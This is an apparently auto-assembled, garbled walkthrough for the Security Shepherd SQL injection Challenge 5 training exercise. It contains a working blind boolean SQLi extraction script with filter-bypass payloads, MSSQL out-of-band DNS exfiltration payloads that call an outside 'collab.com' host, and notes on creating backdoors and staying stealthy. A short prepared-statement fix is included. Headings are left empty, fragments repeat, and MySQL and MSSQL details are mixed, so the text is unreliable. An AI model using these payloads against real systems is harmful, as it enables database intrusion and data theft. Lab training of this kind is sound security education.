Sql+injection+challenge+5+security+shepherd+new -

You will notice the keyword "new" appearing frequently in search queries. Historically, earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. However, the "new" iteration—updated for modern OWASP Top 10 compliance—introduced three critical changes:

These changes force the attacker to use blind, boolean-based, case-shifted injection.

You realize that backslashes (\) are not filtered. In MySQL, a backslash escapes the following character. But here, you don’t need quotes if you can inject without them.

You recall that LIKE clauses can use wildcards: % (any characters) and _ (single character). The filter allows % and _ because they’re not letters/digits/spaces.

Try searching for:
% (just a percent sign)

Query becomes:
SELECT note FROM notes WHERE user_id = 2 AND note LIKE '%%%' — which matches all notes (since %% is same as % in most SQL). Result: Shows both guest and admin notes? No, only guest notes appear. Why? Because user_id = 2 is hardcoded in the query.

Doing this manually takes hours. Use a Python script with requests and binary search logic: sql+injection+challenge+5+security+shepherd+new

import requests

url = "http://localhost:8080/challenge5.jsp"
flag = ""
position = 1


while True:
for ascii_val in range(32, 127):
char = chr(ascii_val)
# Blind boolean payload
payload = f"1'//aNd//(SeLeCt//SuBsTrInG(flag,{position},1)//FrOm//users//LiMiT//0,1)//=/**/'{char}'-- -"
params = {"userid": payload}
resp = requests.get(url, params=params)


    if "User Found" in resp.text:
        flag += char
        print(f"Found: {flag}")
        position += 1
        break
else:
    # No more characters found
    print(f"Final flag: {flag}")
    break

Once you successfully extract the data, the flag for Security Shepherd Challenge 5 usually follows the format: OSWE-<Random_Hash> or shepherd_<alphanumeric>.

Example found in walkthroughs: OSWE-5d41402abc4b2a76b9719d911017c592 You will notice the keyword "new" appearing frequently

As a developer, how do you prevent the exact exploit we just used? The "new" Security Shepherd challenge teaches you that blacklisting (filtering SELECT, spaces, uppercase) fails. The only fix is parameterized queries (prepared statements).

Vulnerable Code (Java JSP):

String query = "SELECT * FROM users WHERE id = '" + request.getParameter("userid") + "'";
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(query);

Fixed Code:

String query = "SELECT * FROM users WHERE id = ?";
PreparedStatement pstmt = conn.prepareStatement(query);
pstmt.setString(1, request.getParameter("userid"));
ResultSet rs = pstmt.executeQuery();

Notice how the fixed code requires zero filters. It separates logic from data entirely.

  • Bypass input filters

  • Extract data via blind methods

  • Time-based: cause delays when condition true:

  • Advanced extraction

  • Pivot to privileged data (user credentials, admin flags).
  • If stacked queries allowed, run additional SELECTs/INSERTs/UPDATEs to escalate or create backdoors.
  • Consider out-of-band exfil (DNS exfiltration) if network/DNS callbacks are possible.

  • Maintain stealth/efficiency

    • First, find the table and column names.

    Payload to get first table name:

    ' OR 1=1; DECLARE @t nvarchar(4000); SET @t = (SELECT TOP 1 table_name FROM information_schema.tables); EXEC xp_dnsresolve @t + '.collab.com' --

    DNS Log result: secret_table.collab.com

    Payload to get column names from secret_table: These changes force the attacker to use blind,

    ' OR 1=1; DECLARE @c nvarchar(4000); SET @c = (SELECT TOP 1 column_name FROM information_schema.columns WHERE table_name='secret_table'); EXEC xp_dnsresolve @c + '.collab.com' --

    Repeat by modifying TOP 1 to TOP 2, etc., or use a loop. You'll discover columns like id, secret_key.

    The first step is always to determine how the application handles our input.

  • Single Quote Test: Enter '.